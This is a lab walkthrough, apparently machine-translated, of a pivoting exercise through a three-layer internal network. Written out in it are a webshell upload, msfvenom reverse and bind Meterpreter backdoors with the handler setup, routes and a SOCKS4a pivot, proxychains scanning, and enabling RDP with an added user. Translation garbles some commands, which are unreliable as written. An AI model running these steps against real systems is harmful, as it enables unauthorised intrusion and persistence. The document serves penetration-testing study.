preface
1. Introduction to the experiment
Network topology
Layer 1 (Extranet Web server): Linux
Second target (Intranet Web server): Linux
Layer 3 (Intranet office) : Win7
Using layer 3 network to simulate the internal and external network environment, mainly understand MSF, Intranet forwarding, etc.
2. Environment construction
Layer 1 network
The penetration machine kali and Win10 nic 1 Settings select VMnet1:
Layer 2 network
Select VMnet2 for Linux NIC 1 and VMnet3 for Add NIC 2:
Layer 3 network
Select VMnet3 for win7 nic 1 Settings:
The last
Build a PHP upload page on the first Linux and the second Linux, and set it as the web page with file upload vulnerability, so that the shell can be used to penetrate the Intranet in the future.
The first Linux
The second stage Linux
3. Experimental process
First floor target drone
Win10 visit http://192.168.85.131/ directly upload a sentence Trojan! [insert picture description here] (HTTP: / / https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/0216c5aa703244ac84f202d2026cf9b2~tplv-k3u1fbpfcp-zoom-1.im age)
Ant sword connection
Further do Intranet penetration, upload MSF back door
Open the kali msfconsole input msfvenom -p Linux/x64 / meterpreter/reverse_tcp LHOST = 192.168.85.128 LPORT = 4444 – f the elf > mshell. The elf
Generate an MSF backdoor file named mshell.elf
Ant Sword uploads the backdoor files to the Linux target
Return MSF to enable listening
Use exploits/multi/handler using monitoring module set payload Linux/x64 / meterpreter/reverse_tcp USES the same content set and trojans lhost 192.168.85.128 Kaili IP set lport 4444 Port of the Trojan run Run
Elf with execution permission./mshell.elf
Kail received the MSF session
Add the routing
Background Route add 172.10.10.0/24 1 Add 172.10.10.0/24 network segment. Run session1 route print to view the routing table
Use MSF to establish a SOCKS proxy
Use auxiliary/server/socks4a set srvhost 192.168.85.128 set srvport 10080 run
After the agent is set up, the infiltrator can enter the layer 2 network through this Linux jumper
Layer 2 network
Nmap detects hosts that have Web services
Use Proxychans to start nMAP to scan port 80 on layer 2 network segment, run proxychains nmap – ST-PN -p 80 172.10.10.0/24
The script probes the surviving host
Create a local script named ping.sh. The script content is as follows:
#! /bin/bash IP = 172.10.10. Echo ping log: >./ping. 254} do ping - 1-1 - w w c IP 1 $$I | grep - q "TTL =" && echo IP "$$I [yes]" > >. / ping. TXT | | echo IP "$$I [no]" > > TXT & done echo "wait 5s... ." sleep 5 cat ./ping.txt cat ./ping.txt | wc -lCopy the code
Python – c ‘import pty. Pty. Spawn (“/bin/bash “) ‘
Create a fully interactive shell after
Chmod 777 ping.sh ./ping.sh
Two pairs of 56.57 live in network segment 172.10.10.0/24 are displayed
Configure the SOck4A proxy in the browser of the penetration machine
Make the MSF back door
Return kali MSF input
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf
Generate mShell1.elf back door file
Layer 3 network
Add the routing
Background route add 10.10.10.0/24 2 route print
Run the post/Windows/manage/enable_rdp open remote desktop run post/Windows/manage/enable_rdp USERNAME = zzy PASSWORD = 123 qwe! Add remote user
Win10 Remote desktop connection
Log in successfully
Network security is a university, to understand thoroughly still have to step by step, to this, I collated a small white toward the infiltration of knowledge summary, and video materials, can be compared to study, you download on the line
【 Download here 】
Ok, probably Intranet infiltration process is like this, like this article’s one key three connection ~
